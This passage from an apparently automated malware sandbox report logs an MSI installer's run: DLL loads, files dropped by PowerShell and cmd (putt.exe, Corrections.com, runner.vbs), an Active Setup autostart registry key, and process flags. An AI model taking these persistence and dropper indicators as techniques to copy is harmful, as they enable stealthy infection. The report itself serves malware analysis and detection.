            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: wsock32.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: napinsp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: pnrpnsp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: wshbth.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: nlaapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: winrnr.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: rstrtmgr.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: dbghelp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\Installer\MSI64FB.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\System32\msiexec.exeAutomated click: Next >
            Source: C:\Windows\System32\msiexec.exeAutomated click: Next >
            Source: C:\Windows\System32\msiexec.exeAutomated click: Install
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Setup.msiStatic file information: File size 2098688 > 1048576
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: MSI64FB.tmp, 00000004.00000000.1886716411.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, MSI64FB.tmp, 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, Setup.msi, MSI64FB.tmp.1.dr, MSI63A2.tmp.1.dr, 625ebf.msi.1.dr, 625ebe.rbs.1.dr, 625ebd.msi.1.dr
            Source: Binary string: cryptosetup.pdbGCTL source: Corrections.com, 0000001A.00000002.3006622611.0000000003AFF000.00000004.00000800.00020000.00000000.sdmp, QQ9RQQ.26.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbC source: MSI64FB.tmp, 00000004.00000000.1886716411.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, MSI64FB.tmp, 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, Setup.msi, MSI64FB.tmp.1.dr, MSI63A2.tmp.1.dr, 625ebf.msi.1.dr, 625ebe.rbs.1.dr, 625ebd.msi.1.dr
            Source: Binary string: cryptosetup.pdb source: Corrections.com, 0000001A.00000002.3006622611.0000000003AFF000.00000004.00000800.00020000.00000000.sdmp, QQ9RQQ.26.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Setup.msi, MSIAE63.tmp.0.dr, MSIAF01.tmp.0.dr, MSI614E.tmp.1.dr, 625ebf.msi.1.dr, MSIAF50.tmp.0.dr, MSIAFB0.tmp.0.dr, MSI60C0.tmp.1.dr
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,16_2_00406328
            Source: lem[1].exe.9.drStatic PE information: real checksum: 0xee8db should be: 0xefc4d
            Source: putt.exe.9.drStatic PE information: real checksum: 0xee8db should be: 0xefc4d
            Source: MSIAE63.tmp.0.drStatic PE information: section name: .fptable
            Source: MSIAF01.tmp.0.drStatic PE information: section name: .fptable
            Source: MSIAF50.tmp.0.drStatic PE information: section name: .fptable
            Source: MSIAF80.tmp.0.drStatic PE information: section name: .fptable
            Source: MSIAFB0.tmp.0.drStatic PE information: section name: .fptable
            Source: MSIB1A5.tmp.0.drStatic PE information: section name: .fptable
            Source: MSIB1E4.tmp.0.drStatic PE information: section name: .fptable
            Source: MSI60C0.tmp.1.drStatic PE information: section name: .fptable
            Source: MSI614E.tmp.1.drStatic PE information: section name: .fptable
            Source: MSI619D.tmp.1.drStatic PE information: section name: .fptable
            Source: MSI64FB.tmp.1.drStatic PE information: section name: .fptable
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B2CD2A5 pushad ; iretd 9_2_00007FFD9B2CD2A6
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F60DE6 push ecx; ret 26_2_00F60DF9

            Persistence and Installation Behavior

            barindex
            Command shell drops VBS files
            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\runner.vbsJump to behavior
            Drops PE files with a suspicious file extension
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\628056\Corrections.comJump to dropped file
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI64FB.tmpJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\628056\Corrections.comJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIB1E4.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI619D.tmpJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exeJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI614E.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAF01.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAE63.tmpJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\putt.exeJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI60C0.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAF50.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAFB0.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIB1A5.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAF80.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI64FB.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile created: C:\ProgramData\37QQIEKNGVAA\QQ9RQQJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile created: C:\ProgramData\37QQIEKNGVAA\QQ9RQQJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI619D.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI614E.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI60C0.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI64FB.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile created: C:\ProgramData\37QQIEKNGVAA\QQ9RQQJump to dropped file

            Boot Survival

            barindex
            Creates an undocumented autostart registry key
            Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2} StubPathJump to behavior
            Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2} StubPathJump to behavior
            Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2} VersionJump to behavior
            Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2} VersionJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FD26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,26_2_00FD26DD
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F5FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,26_2_00F5FC7C
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
